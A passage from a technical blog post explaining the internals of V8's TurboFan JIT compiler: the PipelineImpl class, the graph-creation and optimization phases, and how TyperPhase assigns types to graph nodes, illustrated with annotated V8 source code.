alt="img"></p><p>While the other thread is optimizing the code, the main thread is free to carry on with other work:</p><p><img src="/2021/01/v8-turboFan/threads.png" alt="img"></p></li></ul></li><li><p>From all of the above we can conclude that the actual JIT optimization work lives in the <code>PipelineImpl</code> class, including building the graph and optimizing it.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// v8\src\compiler\pipeline.cc</span></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">PipelineImpl</span> <span 
class="keyword">final</span> &#123;</span><br><span class="line"> <span class="keyword">public</span>:</span><br><span class="line">  <span class="function"><span class="keyword">explicit</span> <span class="title">PipelineImpl</span><span class="params">(PipelineData* data)</span> : data_(data) &#123;</span>&#125;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Helpers for executing pipeline phases.</span></span><br><span class="line">  <span class="keyword">template</span> &lt;<span class="keyword">typename</span> Phase&gt;</span><br><span class="line">  <span class="function"><span class="type">void</span> <span class="title">Run</span><span class="params">()</span></span>;</span><br><span class="line">  <span class="keyword">template</span> &lt;<span class="keyword">typename</span> Phase, <span class="keyword">typename</span> Arg0&gt;</span><br><span class="line">  <span class="function"><span class="type">void</span> <span class="title">Run</span><span class="params">(Arg0 arg_0)</span></span>;</span><br><span class="line">  <span class="keyword">template</span> &lt;<span class="keyword">typename</span> Phase, <span class="keyword">typename</span> Arg0, <span class="keyword">typename</span> Arg1&gt;</span><br><span class="line">  <span class="function"><span class="type">void</span> <span class="title">Run</span><span class="params">(Arg0 arg_0, Arg1 arg_1)</span></span>;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Step A. Run the graph creation and initial optimization passes.</span></span><br><span class="line">  <span class="function"><span class="type">bool</span> <span class="title">CreateGraph</span><span class="params">()</span></span>;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// B. 
Run the concurrent optimization passes.</span></span><br><span class="line">  <span class="function"><span class="type">bool</span> <span class="title">OptimizeGraph</span><span class="params">(Linkage* linkage)</span></span>;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Substep B.1. Produce a scheduled graph.</span></span><br><span class="line">  <span class="function"><span class="type">void</span> <span class="title">ComputeScheduledGraph</span><span class="params">()</span></span>;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Substep B.2. Select instructions from a scheduled graph.</span></span><br><span class="line">  <span class="function"><span class="type">bool</span> <span class="title">SelectInstructions</span><span class="params">(Linkage* linkage)</span></span>;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Step C. Run the code assembly pass.</span></span><br><span class="line">  <span class="function"><span class="type">void</span> <span class="title">AssembleCode</span><span class="params">(Linkage* linkage)</span></span>;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Step D. Run the code finalization pass.</span></span><br><span class="line">  <span class="function">MaybeHandle&lt;Code&gt; <span class="title">FinalizeCode</span><span class="params">()</span></span>;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Step E. 
Install any code dependencies.</span></span><br><span class="line">  <span class="function"><span class="type">bool</span> <span class="title">CommitDependencies</span><span class="params">(Handle&lt;Code&gt; code)</span></span>;</span><br><span class="line"></span><br><span class="line">  <span class="function"><span class="type">void</span> <span class="title">VerifyGeneratedCodeIsIdempotent</span><span class="params">()</span></span>;</span><br><span class="line">  <span class="function"><span class="type">void</span> <span class="title">RunPrintAndVerify</span><span class="params">(<span class="type">const</span> <span class="type">char</span>* phase, <span class="type">bool</span> untyped = <span class="literal">false</span>)</span></span>;</span><br><span class="line">  <span class="function">MaybeHandle&lt;Code&gt; <span class="title">GenerateCode</span><span class="params">(CallDescriptor* call_descriptor)</span></span>;</span><br><span class="line">  <span class="function"><span class="type">void</span> <span class="title">AllocateRegisters</span><span class="params">(<span class="type">const</span> RegisterConfiguration* config,</span></span></span><br><span class="line"><span class="params"><span class="function">                         CallDescriptor* call_descriptor, <span class="type">bool</span> run_verifier)</span></span>;</span><br><span class="line"></span><br><span class="line">  <span class="function">OptimizedCompilationInfo* <span class="title">info</span><span class="params">()</span> <span class="type">const</span></span>;</span><br><span class="line">  <span class="function">Isolate* <span class="title">isolate</span><span class="params">()</span> <span class="type">const</span></span>;</span><br><span class="line">  <span class="function">CodeGenerator* <span class="title">code_generator</span><span class="params">()</span> <span class="type">const</span></span>;</span><br><span class="line"></span><br><span class="line"> <span 
class="keyword">private</span>:</span><br><span class="line">  PipelineData* <span class="type">const</span> data_;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></li></ul><h2 id="五、初探optimization-phases">V. A First Look at Optimization Phases</h2><h3 id="1-简介">1. Introduction</h3><p>Much like the various passes that run over LLVM IR, TurboFan uses a range of phases to build the graph, collect information, and simplify the graph.</p><p>Below is the source of <code>PipelineImpl::CreateGraph</code>, which runs a large number of <code>Phase</code>s. Some of these <code>Phase</code>s build the graph, some optimize it (a few simple optimizations are already applied while the graph is being built), and others prepare for the optimizations that follow:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span 
class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">bool</span> <span class="title">PipelineImpl::CreateGraph</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  PipelineData* data = <span class="keyword">this</span>-&gt;data_;</span><br><span class="line"></span><br><span class="line">  data-&gt;<span class="built_in">BeginPhaseKind</span>(<span class="string">&quot;graph creation&quot;</span>);</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (<span class="built_in">info</span>()-&gt;<span class="built_in">trace_turbo_json_enabled</span>() ||</span><br><span class="line">      <span class="built_in">info</span>()-&gt;<span class="built_in">trace_turbo_graph_enabled</span>()) &#123;</span><br><span class="line">    <span class="function">CodeTracer::Scope <span class="title">tracing_scope</span><span class="params">(data-&gt;GetCodeTracer())</span></span>;</span><br><span class="line">    <span class="function">OFStream <span class="title">os</span><span 
class="params">(tracing_scope.file())</span></span>;</span><br><span class="line">    os &lt;&lt; <span class="string">&quot;---------------------------------------------------\n&quot;</span></span><br><span class="line">       &lt;&lt; <span class="string">&quot;Begin compiling method &quot;</span> &lt;&lt; <span class="built_in">info</span>()-&gt;<span class="built_in">GetDebugName</span>().<span class="built_in">get</span>()</span><br><span class="line">       &lt;&lt; <span class="string">&quot; using Turbofan&quot;</span> &lt;&lt; std::endl;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">if</span> (<span class="built_in">info</span>()-&gt;<span class="built_in">trace_turbo_json_enabled</span>()) &#123;</span><br><span class="line">    <span class="function">TurboCfgFile <span class="title">tcf</span><span class="params">(isolate())</span></span>;</span><br><span class="line">    tcf &lt;&lt; <span class="built_in">AsC1VCompilation</span>(<span class="built_in">info</span>());</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  data-&gt;<span class="built_in">source_positions</span>()-&gt;<span class="built_in">AddDecorator</span>();</span><br><span class="line">  <span class="keyword">if</span> (data-&gt;<span class="built_in">info</span>()-&gt;<span class="built_in">trace_turbo_json_enabled</span>()) &#123;</span><br><span class="line">    data-&gt;<span class="built_in">node_origins</span>()-&gt;<span class="built_in">AddDecorator</span>();</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="built_in">Run</span>&lt;GraphBuilderPhase&gt;();</span><br><span class="line">  <span class="built_in">RunPrintAndVerify</span>(GraphBuilderPhase::<span class="built_in">phase_name</span>(), <span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Perform 
function context specialization and inlining (if enabled).</span></span><br><span class="line">  <span class="built_in">Run</span>&lt;InliningPhase&gt;();</span><br><span class="line">  <span class="built_in">RunPrintAndVerify</span>(InliningPhase::<span class="built_in">phase_name</span>(), <span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Remove dead-&gt;live edges from the graph.</span></span><br><span class="line">  <span class="built_in">Run</span>&lt;EarlyGraphTrimmingPhase&gt;();</span><br><span class="line">  <span class="built_in">RunPrintAndVerify</span>(EarlyGraphTrimmingPhase::<span class="built_in">phase_name</span>(), <span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Run the type-sensitive lowerings and optimizations on the graph.</span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="comment">// Determine the Typer operation flags.</span></span><br><span class="line">    Typer::Flags flags = Typer::kNoFlags;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">is_sloppy</span>(<span class="built_in">info</span>()-&gt;<span class="built_in">shared_info</span>()-&gt;<span class="built_in">language_mode</span>()) &amp;&amp;</span><br><span class="line">        <span class="built_in">info</span>()-&gt;<span class="built_in">shared_info</span>()-&gt;<span class="built_in">IsUserJavaScript</span>()) &#123;</span><br><span class="line">      <span class="comment">// Sloppy mode functions always have an Object for this.</span></span><br><span class="line">      flags |= Typer::kThisIsReceiver;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">IsClassConstructor</span>(<span class="built_in">info</span>()-&gt;<span class="built_in">shared_info</span>()-&gt;<span 
class="built_in">kind</span>())) &#123;</span><br><span class="line">      <span class="comment">// Class constructors cannot be [[Call]]ed.</span></span><br><span class="line">      flags |= Typer::kNewTargetIsReceiver;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Type the graph and keep the Typer running on newly created nodes within</span></span><br><span class="line">    <span class="comment">// this scope; the Typer is automatically unlinked from the Graph once we</span></span><br><span class="line">    <span class="comment">// leave this scope below.</span></span><br><span class="line">    <span class="function">Typer <span class="title">typer</span><span class="params">(isolate(), data-&gt;js_heap_broker(), flags, data-&gt;graph())</span></span>;</span><br><span class="line">    <span class="built_in">Run</span>&lt;TyperPhase&gt;(&amp;typer);</span><br><span class="line">    <span class="built_in">RunPrintAndVerify</span>(TyperPhase::<span class="built_in">phase_name</span>());</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Do some hacky things to prepare for the optimization phase.</span></span><br><span class="line">    <span class="comment">// (caching handles, etc.).</span></span><br><span class="line">    <span class="built_in">Run</span>&lt;ConcurrentOptimizationPrepPhase&gt;();</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (FLAG_concurrent_compiler_frontend) &#123;</span><br><span class="line">      data-&gt;<span class="built_in">js_heap_broker</span>()-&gt;<span class="built_in">SerializeStandardObjects</span>();</span><br><span class="line">      <span class="built_in">Run</span>&lt;CopyMetadataForConcurrentCompilePhase&gt;();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Lower JSOperators where we 
can determine types.</span></span><br><span class="line">    <span class="built_in">Run</span>&lt;TypedLoweringPhase&gt;();</span><br><span class="line">    <span class="built_in">RunPrintAndVerify</span>(TypedLoweringPhase::<span class="built_in">phase_name</span>());</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  data-&gt;<span class="built_in">EndPhaseKind</span>();</span><br><span class="line"></span><br><span class="line">  <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>The source of <code>PipelineImpl::OptimizeGraph</code> follows; this function optimizes the graph that has just been built:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span 
class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">bool</span> <span class="title">PipelineImpl::OptimizeGraph</span><span class="params">(Linkage* linkage)</span> </span>&#123;</span><br><span class="line">  PipelineData* data = <span class="keyword">this</span>-&gt;data_;</span><br><span 
class="line"></span><br><span class="line">  data-&gt;<span class="built_in">BeginPhaseKind</span>(<span class="string">&quot;lowering&quot;</span>);</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (data-&gt;<span class="built_in">info</span>()-&gt;<span class="built_in">is_loop_peeling_enabled</span>()) &#123;</span><br><span class="line">    <span class="built_in">Run</span>&lt;LoopPeelingPhase&gt;();</span><br><span class="line">    <span class="built_in">RunPrintAndVerify</span>(LoopPeelingPhase::<span class="built_in">phase_name</span>(), <span class="literal">true</span>);</span><br><span class="line">  &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="built_in">Run</span>&lt;LoopExitEliminationPhase&gt;();</span><br><span class="line">    <span class="built_in">RunPrintAndVerify</span>(LoopExitEliminationPhase::<span class="built_in">phase_name</span>(), <span class="literal">true</span>);</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (FLAG_turbo_load_elimination) &#123;</span><br><span class="line">    <span class="built_in">Run</span>&lt;LoadEliminationPhase&gt;();</span><br><span class="line">    <span class="built_in">RunPrintAndVerify</span>(LoadEliminationPhase::<span class="built_in">phase_name</span>());</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (FLAG_turbo_escape) &#123;</span><br><span class="line">    <span class="built_in">Run</span>&lt;EscapeAnalysisPhase&gt;();</span><br><span class="line">    <span class="keyword">if</span> (data-&gt;<span class="built_in">compilation_failed</span>()) &#123;</span><br><span class="line">      <span class="built_in">info</span>()-&gt;<span class="built_in">AbortOptimization</span>(</span><br><span class="line">          
BailoutReason::kCyclicObjectStateDetectedInEscapeAnalysis);</span><br><span class="line">      data-&gt;<span class="built_in">EndPhaseKind</span>();</span><br><span class="line">      <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">RunPrintAndVerify</span>(EscapeAnalysisPhase::<span class="built_in">phase_name</span>());</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Perform simplified lowering. This has to run w/o the Typer decorator,</span></span><br><span class="line">  <span class="comment">// because we cannot compute meaningful types anyways, and the computed types</span></span><br><span class="line">  <span class="comment">// might even conflict with the representation/truncation logic.</span></span><br><span class="line">  <span class="built_in">Run</span>&lt;SimplifiedLoweringPhase&gt;();</span><br><span class="line">  <span class="built_in">RunPrintAndVerify</span>(SimplifiedLoweringPhase::<span class="built_in">phase_name</span>(), <span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// From now on it is invalid to look at types on the nodes, because the types</span></span><br><span class="line">  <span class="comment">// on the nodes might not make sense after representation selection due to the</span></span><br><span class="line">  <span class="comment">// way we handle truncations; if we&#x27;d want to look at types afterwards we&#x27;d</span></span><br><span class="line">  <span class="comment">// essentially need to re-type (large portions of) the graph.</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">// In order to catch bugs related to type access after this point, we now</span></span><br><span class="line">  <span class="comment">// remove the 
types from the nodes (currently only in Debug builds).</span></span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> DEBUG</span></span><br><span class="line">  <span class="built_in">Run</span>&lt;UntyperPhase&gt;();</span><br><span class="line">  <span class="built_in">RunPrintAndVerify</span>(UntyperPhase::<span class="built_in">phase_name</span>(), <span class="literal">true</span>);</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line"></span><br><span class="line">  <span class="comment">// Run generic lowering pass.</span></span><br><span class="line">  <span class="built_in">Run</span>&lt;GenericLoweringPhase&gt;();</span><br><span class="line">  <span class="built_in">RunPrintAndVerify</span>(GenericLoweringPhase::<span class="built_in">phase_name</span>(), <span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line">  data-&gt;<span class="built_in">BeginPhaseKind</span>(<span class="string">&quot;block building&quot;</span>);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Run early optimization pass.</span></span><br><span class="line">  <span class="built_in">Run</span>&lt;EarlyOptimizationPhase&gt;();</span><br><span class="line">  <span class="built_in">RunPrintAndVerify</span>(EarlyOptimizationPhase::<span class="built_in">phase_name</span>(), <span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line">  <span class="built_in">Run</span>&lt;EffectControlLinearizationPhase&gt;();</span><br><span class="line">  <span class="built_in">RunPrintAndVerify</span>(EffectControlLinearizationPhase::<span class="built_in">phase_name</span>(), <span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (FLAG_turbo_store_elimination) &#123;</span><br><span class="line">    <span 
class="built_in">Run</span>&lt;StoreStoreEliminationPhase&gt;();</span><br><span class="line">    <span class="built_in">RunPrintAndVerify</span>(StoreStoreEliminationPhase::<span class="built_in">phase_name</span>(), <span class="literal">true</span>);</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Optimize control flow.</span></span><br><span class="line">  <span class="keyword">if</span> (FLAG_turbo_cf_optimization) &#123;</span><br><span class="line">    <span class="built_in">Run</span>&lt;ControlFlowOptimizationPhase&gt;();</span><br><span class="line">    <span class="built_in">RunPrintAndVerify</span>(ControlFlowOptimizationPhase::<span class="built_in">phase_name</span>(), <span class="literal">true</span>);</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Optimize memory access and allocation operations.</span></span><br><span class="line">  <span class="built_in">Run</span>&lt;MemoryOptimizationPhase&gt;();</span><br><span class="line">  <span class="comment">// TODO(jarin, rossberg): Remove UNTYPED once machine typing works.</span></span><br><span class="line">  <span class="built_in">RunPrintAndVerify</span>(MemoryOptimizationPhase::<span class="built_in">phase_name</span>(), <span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Lower changes that have been inserted before.</span></span><br><span class="line">  <span class="built_in">Run</span>&lt;LateOptimizationPhase&gt;();</span><br><span class="line">  <span class="comment">// TODO(jarin, rossberg): Remove UNTYPED once machine typing works.</span></span><br><span class="line">  <span class="built_in">RunPrintAndVerify</span>(LateOptimizationPhase::<span class="built_in">phase_name</span>(), <span class="literal">true</span>);</span><br><span class="line"></span><br><span 
class="line">  data-&gt;<span class="built_in">source_positions</span>()-&gt;<span class="built_in">RemoveDecorator</span>();</span><br><span class="line">  <span class="keyword">if</span> (data-&gt;<span class="built_in">info</span>()-&gt;<span class="built_in">trace_turbo_json_enabled</span>()) &#123;</span><br><span class="line">    data-&gt;<span class="built_in">node_origins</span>()-&gt;<span class="built_in">RemoveDecorator</span>();</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="built_in">ComputeScheduledGraph</span>();</span><br><span class="line"></span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">SelectInstructions</span>(linkage);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>These two functions involve too many <code>Phase</code>s to cover one by one, so please read the source to learn what each Phase does.</p><p>From here on we look only at a few of the more important <code>Phases</code>: <code>GraphBuilderPhase</code>, <code>TyperPhase</code>, and <code>SimplifiedLoweringPhase</code>.</p><h3 id="2-GraphBuilderPhase">2. GraphBuilderPhase</h3><ul><li><p><code>GraphBuilderPhase</code> walks the bytecode and builds an initial graph. The later Phases then work on this graph, including but not limited to the various code optimizations.</p></li><li><p>A simple example:</p><p><img src="/2021/01/v8-turboFan/bytecodegraphbuilder.png" alt="img"></p></li></ul><h3 id="3-TyperPhase">3. 
TyperPhase</h3><ul><li><p><code>TyperPhase</code> visits every node in the graph and assigns each one a <code>Type</code>. It runs once graph construction has finished.</p><blockquote><p>Assigning a Type to every node looks a lot like semantic analysis from a compilers course, doesn't it? XD</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">bool</span> <span class="title">PipelineImpl::CreateGraph</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">  <span class="built_in">Run</span>&lt;GraphBuilderPhase&gt;();</span><br><span class="line">  <span class="built_in">RunPrintAndVerify</span>(GraphBuilderPhase::<span class="built_in">phase_name</span>(), <span class="literal">true</span>);</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">  <span class="comment">// Run the type-sensitive lowerings and optimizations on the graph.</span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">// Type the graph and keep the Typer running on newly created nodes within</span></span><br><span class="line">    <span class="comment">// this scope; the Typer is automatically unlinked from the 
Graph once we</span></span><br><span class="line">    <span class="comment">// leave this scope below.</span></span><br><span class="line">    <span class="function">Typer <span class="title">typer</span><span class="params">(isolate(), data-&gt;js_heap_broker(), flags, data-&gt;graph())</span></span>;</span><br><span class="line">    <span class="built_in">Run</span>&lt;TyperPhase&gt;(&amp;typer);</span><br><span class="line">    <span class="built_in">RunPrintAndVerify</span>(TyperPhase::<span class="built_in">phase_name</span>());</span><br><span class="line"></span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>其中，具体执行的是<code>TyperPhase::Run</code>函数：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">struct</span> <span class="title class_">TyperPhase</span> &#123;</span><br><span class="line">  <span class="function"><span class="type">static</span> <span class="type">const</span> <span class="type">char</span>* <span class="title">phase_name</span><span class="params">()</span> </span>&#123; <span class="keyword">return</span> <span class="string">&quot;typer&quot;</span>; &#125;</span><br><span class="line"></span><br><span class="line">  <span class="function"><span class="type">void</span> <span class="title">Run</span><span class="params">(PipelineData* data, Zone* temp_zone, Typer* typer)</span> </span>&#123;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    
typer-&gt;<span class="built_in">Run</span>(roots, &amp;induction_vars);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>This function goes on to call <code>Typer::Run</code>, which eventually reaches <code>Typer::Visitor::Reduce</code> from inside <code>GraphReducer::ReduceGraph</code>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">Typer::Run</span><span class="params">(<span class="type">const</span> NodeVector&amp; roots,</span></span></span><br><span class="line"><span class="params"><span class="function">                LoopVariableOptimizer* induction_vars)</span> </span>&#123;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">  <span class="function">Visitor <span class="title">visitor</span><span class="params">(<span class="keyword">this</span>, induction_vars)</span></span>;</span><br><span class="line">  <span class="function">GraphReducer <span class="title">graph_reducer</span><span class="params">(zone(), graph())</span></span>;</span><br><span class="line">  graph_reducer.<span class="built_in">AddReducer</span>(&amp;visitor);</span><br><span class="line">  <span class="keyword">for</span> (Node* <span class="type">const</span> root : roots) graph_reducer.<span class="built_in">ReduceNode</span>(root);</span><br><span class="line">  graph_reducer.<span class="built_in">ReduceGraph</span>();</span><br><span class="line">  <span class="comment">// ...</span></span><br><span 
class="line">&#125;</span><br></pre></td></tr></table></figure><p><code>Typer::Visitor::Reduce</code> contains a large switch statement. As the Visitor walks each node, this switch dispatches to the corresponding <code>XXXTyper</code> function.</p><blockquote><p>For example, a JSCall node ends up in <code>Typer::Visitor::JSCallTyper</code> during TyperPhase.</p></blockquote></li><li><p>Here is a quick look at the source of <code>JSCallTyper</code>. It contains a very large switch statement that sets the <code>Type</code> of each <code>Builtin</code> function node, that is, the type of the function's return value.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">Type Typer::Visitor::<span class="built_in">JSCallTyper</span>(Type fun, Typer* t) &#123;</span><br><span class="line">  <span class="keyword">if</span> (!fun.<span class="built_in">IsHeapConstant</span>() || !fun.<span class="built_in">AsHeapConstant</span>()-&gt;<span class="built_in">Ref</span>().<span class="built_in">IsJSFunction</span>()) &#123;</span><br><span class="line">    <span class="keyword">return</span> Type::<span class="built_in">NonInternal</span>();</span><br><span class="line">  &#125;</span><br><span class="line">  JSFunctionRef function = fun.<span class="built_in">AsHeapConstant</span>()-&gt;<span class="built_in">Ref</span>().<span class="built_in">AsJSFunction</span>();</span><br><span class="line">  <span class="keyword">if</span> (!function.<span class="built_in">shared</span>().<span class="built_in">HasBuiltinFunctionId</span>()) &#123;</span><br><span class="line">    <span class="keyword">return</span> Type::<span class="built_in">NonInternal</span>();</span><br><span class="line">  &#125;</span><br><span class="line">  <span 
